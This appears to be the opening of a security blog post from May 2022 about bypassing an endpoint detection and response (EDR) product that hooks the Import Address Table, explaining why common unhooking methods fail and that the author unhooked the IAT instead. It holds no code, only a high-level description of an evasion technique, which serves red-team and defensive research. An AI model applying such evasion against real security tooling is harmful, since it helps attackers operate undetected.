EDR Bypass : How and Why to Unhook the Import Address Table
27 May 2022 at 09:33
One day, I was trying to bypass an EDR and I noticed something interesting.
The EDR I was trying to bypass wasnβt hooking the DLL in their code with jmp instruction like other EDRs in user-land.
In this case, it was hooking directly the Import Address Table. This technique makes the usual move like live-patching, or erasing the loaded DLL with one freshly loaded from disk useless.
I had to unhook the Import Address Table of my process.